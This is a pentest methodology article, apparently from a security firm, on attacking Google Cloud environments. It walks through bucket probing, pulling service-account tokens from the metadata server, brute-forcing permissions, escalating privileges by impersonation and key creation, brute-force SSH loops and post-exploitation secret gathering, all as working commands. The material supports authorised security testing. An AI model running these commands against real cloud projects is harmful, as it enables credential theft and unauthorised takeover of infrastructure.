GCP Penetration Testing: Methodology and Use Cases

Pentesting a GCP (Google Cloud Platform) infrastructure and the web applications deployed on it is a key step in identifying vulnerabilities and strengthening resilience against attacks.

This article presents the methodology adopted during a GCP infrastructure penetration test, the main types of tests performed, and some concrete examples.

Comprehensive Guide to GCP Pentesting

GCP Penetration Testing Methodology

During a web app security audit, a GCP environment can present itself in two main ways:

  • either the web server or application is hosted directly on GCP instances (Compute Engine, App Engine, Cloud Functions, etc.);
  • or the application relies on Google Cloud services such as CDN, Cloud SQL, Cloud Storage, etc.

In both cases, the success of the audit depends on specific knowledge that allows these different elements to be tested effectively.

In this section, we will review several common scenarios and propose a structured methodology based on practical experience.

Given the richness of the GCP ecosystem and the diversity of possible configurations, the approach presented here does not claim to cover all cases. Rather, it aims to provide a general framework that is flexible enough to be adapted to your context.

During a penetration test, it is common to encounter a Google Storage bucket:

  • either because files are stored and accessible via the web application,
  • or because the platform allows file uploads.

In this case, several approaches can be used to assess the security level of the bucket.

Public bucket

If the bucket is completely public, you can test access with a browser or with curl:

  • List the files:
https://storage.googleapis.com/<storage-name>/
  • Access a file directly:
https://storage.googleapis.com/<storage-name>/<path>/<file>
  • List the bucket’s IAM permissions:
https://www.googleapis.com/storage/v1/b/<storage-name>/iam
  • Brute force testing of associated permissions (even if the previous command fails):
https://www.googleapis.com/storage/v1/b/<storage-name>/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update

Restricted anonymous access

In some cases, access is not public, but is still possible from any Google account. You will then need to test whether you can list or download content using a basic user account.

To do this, you need to initialise the CLI with a Google account:

gcloud auth list
gcloud config set account <your-email>

If you have never connected your user account to gcloud, you will need to do so using the following commands:

gcloud init
gcloud auth login --no-launch-browser

We will see later that it is also possible to use Services Accounts (e.g. in the event of token theft) in the CLI. This can allow access to the bucket, if the account in question has the rights.

  • List the documents in the bucket:
gcloud storage ls gs://<storage-name>/
gcloud storage ls gs://<storage-name>/<directory>/

In this article, we mainly use the gcloud CLI. It is also possible to use gsutil, a wrapper for gcloud. In some cases, we will also provide gsutil commands as examples.

gsutil ls gs://<storage-name>
gsutil ls gs://<storage-name>/<directory>/

Download a file:

gcloud storage cp gs://<storage-name>/<file> .

Check IAM permissions:

gsutil iam get gs://<storage-name>

Access to the bucket via a compromised Service Account

If you have a Service Account token with access to the bucket, you can initialise the CLI with this account and then reuse the same commands.

To do this, you need to initialise the CLI with the stolen token:

export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>

You can then query the bucket using the same commands listed in the previous section:

gsutil ls gs://<storage-name>
# etc.

Note that it is possible to check multiple buckets. If you have retrieved a list of buckets present on the GCP project, you can automate access verification:

while IFS= read -r i
do
  echo $i :
  gcloud storage ls gs://$i
done < ./storages.txt

On GCP, metadata servers can be accessed via the address 169.254.169.254 or the URL http://metadata.google.internal/.

These servers are consulted by GCP instances (e.g. a Compute Engine VM) in order to retrieve:

  • information about the instance (hostname, geographical area, etc.),
  • information about the associated GCP project,
  • and details about the Service Account (SA) used by the instance.

During a penetration test, the exploitation of this server allows useful, and sometimes sensitive, data to be collected.

Access to the metadata server

There are two main scenarios for querying this server:

  1. Exploiting an SSRF vulnerability: if the application has an SSRF, it is possible to hijack it to reach http://metadata.google.internal/.
  2. Access to a compromised machine: if you have access (RCE, SSH, etc.) to a GCP instance, you can send HTTP requests directly to the metadata server.

Since 2019, GCP requires the presence of the Metadata-Flavor: Google header to accept a request. This measure renders classic SSRFs ineffective, unless a CRLF injection allows the header to be added, which remains unlikely.

    Metadata exploitation

    If you have access to a Compute Engine instance (via RCE or shell), you can extract several useful pieces of information:

    # Hostname of the instance
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/hostname’
    
    # Project ID
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/project/project-id’
    
    # Zone
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/zone’
    
    # Network interfaces
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/’
    Service Accounts

    Service accounts are particularly sensitive: they allow attackers to exploit their privileges to access additional resources or move further into the infrastructure.

    • List the SAs available on the instance:
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"
    • Extract the token from the default SA:
    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"

    If several service accounts are configured, it is important to collect them all. It is also useful to check the scope associated with the service account:

    curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"

    Note that a critical scope is as follows: https://www.googleapis.com/auth/cloud-platform. It indicates that the account is not subject to any restrictions and can authenticate with all GCP APIs.

    However, if the scope is limited (e.g. cloud-platform.read-only), privilege escalation will be required.

    Startup scripts and Guest attributes

    Sensitive data may also be present in startup scripts or guest attributes:

    # Retrieve startup scripts
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text’
    
    # Retrieve guest attributes
    curl -H ‘Metadata-Flavour: Google’ ‘http://metadata.google.internal/computeMetadata/v1/instance/guest-attributes/’

    For a more comprehensive list of metadata exploitation endpoints, please refer to the dedicated section on HackTricks.

    If you obtain a service account (via a token leak or RCE), you have a powerful lever for mapping and exploitation of the GCP infrastructure.

    The testing methodology generally follows three steps:

    1. List the permissions associated with the service account
    2. Exploit these permissions:
      • either they allow privilege escalation (privesc),
      • or they allow sensitive data to be collected.
    3. Test access to specific resources (buckets, instances, other SAs).

    Listing permissions associated with the SA

    There is no native command to directly display all permissions for a service account. The solution is to brute force them, testing each permission one by one.

    Several public scripts facilitate this task. For example: test-permissions.py (Thunder-CTF)

    Before running the script, set the project environment variable:

    gcloud config set project [PROJECT_ID]

    Then run the script with the service account token:

    python3 test-permissions.py $TOKEN

    The script returns a list of active permissions. Example:

    ['compute.addresses.list', 'compute.instances.list', 'compute.zones.list', 'iam.serviceAccounts.list', 'storage.buckets.list']

    The format may vary depending on the script, but the information obtained remains similar. This list will serve as a basis for exploitation.

    Exploiting permissions

    To use the service account in the CLI, set its token:

    export CLOUDSDK_AUTH_ACCESS_TOKEN=$TOKEN

    All gcloud commands will then be executed with this account.

    Privesc (privilege escalation)

    As stated in the introduction to this section, there are two possible scenarios. In one case, one of the permissions can be used directly for privilege escalation. You can consult a dedicated cheat sheet to identify permissions that can be exploited for privilege escalation: HackTricks – GCP Privilege Escalation.

    Example: if the following permission appears in your results:

    iam.serviceAccounts.getAccessToken

    This permission allows you to obtain an access token for any service account. The documented exploitation is:

    gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" auth print-access-token

    This gives you direct access to the target account. If no permissions allow privesc, you can still use these permissions to access data.

    Collecting data with available permissions

    If no critical permissions allow escalation, use those obtained to explore the infrastructure.

    Example with two permissions:

    gcloud iam service-accounts list

    Result: you obtain a list of existing service accounts on the project. This list could, for example, be used in the case of privesc presented above.

    gcloud storage buckets list

    Result: you will obtain a list of existing buckets (Google Storage) on the project, which you can then test.

    Note: Listing permissions are useful for mapping the cloud infrastructure. Whenever you can list a type of resource (for example, service accounts and buckets), save this list in a file.

    These lists will be very useful when you try to exploit other privileges or seek to access resources. It is this second point that we will now look at.

    Scoped permissions on resources

    The permissions listed above are generally defined at the project level. However, an account may also have specific rights to certain individual resources.

    Even without the necessary global permissions (such as iam.roles.list or iam.serviceAccounts.getIamPolicy), you can test your access by brute forcing the resources already identified.

    Let us look at a few examples:

    • Buckets Storage: testing access to each bucket listed.
    while IFS= read -r i
    do
      echo $i :
      gcloud storage ls gs://$i
    done < ./storages.txt
    • Compute Engine instances: attempting SSH access.
    gcloud compute ssh --project=<project-id> --zone=<zone> <instance-name>

    Only instances with an external IP address are accessible, but you can test all instances:

    for i in $(gcloud compute instances list --format="table[no-heading]"); do
      echo Trying SSH on $i:
      gcloud compute ssh --project=<project-id> --zone=<zone> $i
    done
    • Service Accounts and Key Management:

    If you were able to list the service accounts (iam.serviceAccounts.list), you can check whether keys exist:

    for i in $(gcloud iam service-accounts list --format="table[no-heading](email)"); do
      echo Looking for keys for $i:
      gcloud iam service-accounts keys list --iam-account $i
    done

    This does not allow you to collect the keys in question, but it is a good indication of which service account you could potentially generate a key for.

    You can then attempt to create a key:

    gcloud iam service-accounts keys create --iam-account <SA-name>@<project-name>.iam.gserviceaccount.com key.json

    If this works, you can regain access to the SAs by importing the key into your CLI:

    gcloud auth activate-service-account --key-file=<file.json>

    Exploiting an instance: RCE and post-exploitation

    After examining the exploitation of a service account, let us now consider the scenario where you obtain direct access to an instance.

    This access can be obtained in various ways:

    • directly via SSH or a shell (including reverse shell),
    • indirectly via an RCE vulnerability.

    In all cases, post-exploitation actions follow a similar logic.

    Searching for useful or sensitive information

    As in any post-exploitation phase, start by searching for secrets, tokens, sensitive configuration files, or any information related to the network and instance.

    Some classic commands:

    cat /etc/hosts
    printenv
    ls /etc/ssh

    For a more comprehensive methodology, you can refer to dedicated cheat sheets: Linux Privilege Escalation Basics.

    For more comprehensive information, also search for content related to GCP:

    sudo find / -name "gcloud"

    Finally, do not forget to query the metadata server (see dedicated section). Each compromised instance may offer new exploitable information via this channel.

    Internal network analysis

    From the compromised instance, map the internal network to identify other accessible machines and services.

    • Network scanning with Nmap
    • Potential targets: internal web services, SSH, Kubernetes clusters, etc.

    At this stage, all the classic techniques of an internal pentest can be applied to pivot, compromise other systems, or collect more data.

    Note: always test SSH connections, not only on the current instance, but also on those discovered via Nmap or listed with gcloud. Your instance may contain the SSH key used to connect to other machines.

    Exploiting Service Accounts present on the instance

    Another area of exploitation involves directly using the service accounts available on the instance.

    • List available accounts:
    gcloud auth list
    • Switch to a specific account:
    gcloud config set account <account-email>
    • Extract an associated token:
    gcloud auth print-access-token

    You can then use these service accounts to follow the methodology presented in the section dedicated to their exploitation.

    Conclusion

    The exploitation of a GCP instance combines:

    • traditional post-exploitation on Linux (secret collection, system exploration, network scanning),
    • and cloud-specific exploitation (metadata, service accounts, GCP resources).

    Each access to an instance must therefore be considered as a potential pivot point to the entire cloud infrastructure.

    Author: Cédric CALLY–CABALLERO – Pentester @Vaadata